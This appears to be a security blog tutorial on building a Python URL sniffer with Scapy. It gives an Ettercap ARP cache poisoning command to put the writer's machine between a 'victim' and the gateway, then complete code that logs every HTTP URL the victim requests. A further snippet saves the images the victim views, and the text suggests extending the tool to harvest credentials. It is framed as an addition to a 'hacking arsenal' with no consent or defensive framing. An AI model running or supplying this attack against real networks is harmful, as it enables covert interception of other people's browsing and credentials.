Developing a URL Sniffer in Python | Lucideus Research

A URL sniffer can be a handy tool for a security researcher to extract information about the nature of data flowing through a victim machine, and a useful aid for monitoring the content being accessed on it. In this post we describe how to code a URL sniffer in Python 2.7 using the Scapy library. We will further explain how you can build upon this tool to develop other exciting monitoring tools for your hacking arsenal.

Scapy

Let’s begin with an understanding of the Scapy library in Python. This library is like a Swiss army knife for security researchers and network programmers, with a plethora of functions for working with network layers. It is a packet manipulation library that can forge, sniff and transmit packets, and it can easily replace up to 85% of the functionality of nmap, hping, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc. In this post we will leverage Scapy to parse the HTTP layer and sniff the URLs being accessed on the victim machine. You can install Scapy easily using the following commands:

$ pip install scapy
$ pip install scapy-http

Man In The Middle

The next step after installing Scapy is to perform a Man in the Middle attack by poisoning the victim's ARP cache, using a tool like Ettercap. This overwrites the cache so that the victim machine considers our machine to be the default gateway, which ensures that the data going in and out of the victim machine routes through our machine. We can then sniff the victim's packets and extract the URLs from them.
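As a rough sketch, on a Linux attacker machine this step typically looks something like the following; the interface name and IP addresses are placeholders of our own, not values from the original post, and the exact Ettercap target syntax varies slightly between versions:

```shell
# Keep IP forwarding enabled so the victim's traffic still reaches the real gateway
$ echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# ARP-poison victim and gateway with Ettercap's text interface
$ sudo ettercap -T -i eth0 -M arp:remote /192.168.1.7// /192.168.1.1//
```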

Figure 1: ARP cache poisoning using Ettercap

With the Man in the Middle attack in place, we can develop the sniffer and read the packets.

Sniffer Development

First, import all the required modules from the Scapy library.

from scapy.all import IP
from scapy.all import sniff
from scapy.layers import http

  • The IP class is used to manipulate IP packets.
  • The sniff function captures packets of different types, such as TCP, UDP and DHCP.
  • The http module (provided by the scapy-http package) is used to parse HTTP packets.

After importing all the required modules, we can write the callback that extracts the URLs.

def sniff_urls(packet):
    if packet.haslayer(http.HTTPRequest):
        http_layer = packet.getlayer(http.HTTPRequest)
        ip_layer = packet.getlayer(IP)
        print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields)

This function first checks whether the packet has an HTTP request layer. If it does, it extracts the HTTP layer and the IP layer from the packet, then prints the source IP address, the HTTP method and the reconstructed URL. After defining the callback, we start the sniffer:

sniff(filter='tcp', prn=sniff_urls)

The sniff function starts the sniffer and takes two notable parameters:
  • filter: a BPF filter expression; 'tcp' restricts capture to TCP packets.
  • prn: a callback invoked for each captured packet; here, sniff_urls displays the required information (the URLs) from the captured TCP packets.
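The format string inside sniff_urls indexes directly into the fields dictionaries that Scapy attaches to each layer ('{0[src]}' looks up the key 'src' in the first positional argument, and so on). The mechanics can be seen without any live traffic by using stand-in dictionaries; the values below are invented purely for illustration:

```python
# Stand-ins for ip_layer.fields and http_layer.fields (invented values)
ip_fields = {'src': '192.168.1.7'}
http_fields = {'Method': 'GET', 'Host': 'example.com', 'Path': '/index.html'}

# Same format string the callback uses to rebuild the URL
line = '{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_fields, http_fields)
print(line)  # 192.168.1.7 - GET - http://example.com/index.html
```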

The final sniffer code looks like:

from scapy.all import IP
from scapy.all import sniff
from scapy.layers import http

# Extracting all URLS

def sniff_urls(packet):
    if packet.haslayer(http.HTTPRequest):
        http_layer = packet.getlayer(http.HTTPRequest)
        ip_layer = packet.getlayer(IP)
        print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields)

# Start sniffing the network.
sniff(filter='tcp', prn=sniff_urls)
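Sniffing raw packets requires elevated privileges, so the script (saved here under an assumed name, url_sniffer.py) is typically run as root:

```shell
$ sudo python url_sniffer.py
```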

When we run the sniffer, sample output is generated as shown.

Figure 2: Sniffed URLs




Way Forward

This simple yet effective monitoring tool can be hacked together within 30 minutes or so. Moreover, it can be extended to sniff several other kinds of traffic, such as DHCP and UDP requests or sensitive credentials. It can also be used to display or save the images being viewed by the victim (just like your own Driftnet) using something like the code snippet below.

import urllib

urllib.urlretrieve('http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields), 'img_name.png')
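To avoid downloading every request, one simple heuristic is to check the request path's extension before calling urlretrieve. The helper below is our own illustrative addition, not part of the original tool, and the extension list is an arbitrary choice:

```python
import os

# File extensions we (arbitrarily) treat as images
IMAGE_EXTS = {'.png', '.jpg', '.jpeg', '.gif', '.bmp'}

def is_image_path(path):
    """Return True if the URL path appears to request an image."""
    # Drop any query string before inspecting the extension
    ext = os.path.splitext(path.split('?', 1)[0])[1].lower()
    return ext in IMAGE_EXTS

print(is_image_path('/images/photo.jpg?size=large'))  # True
print(is_image_path('/index.html'))                   # False
```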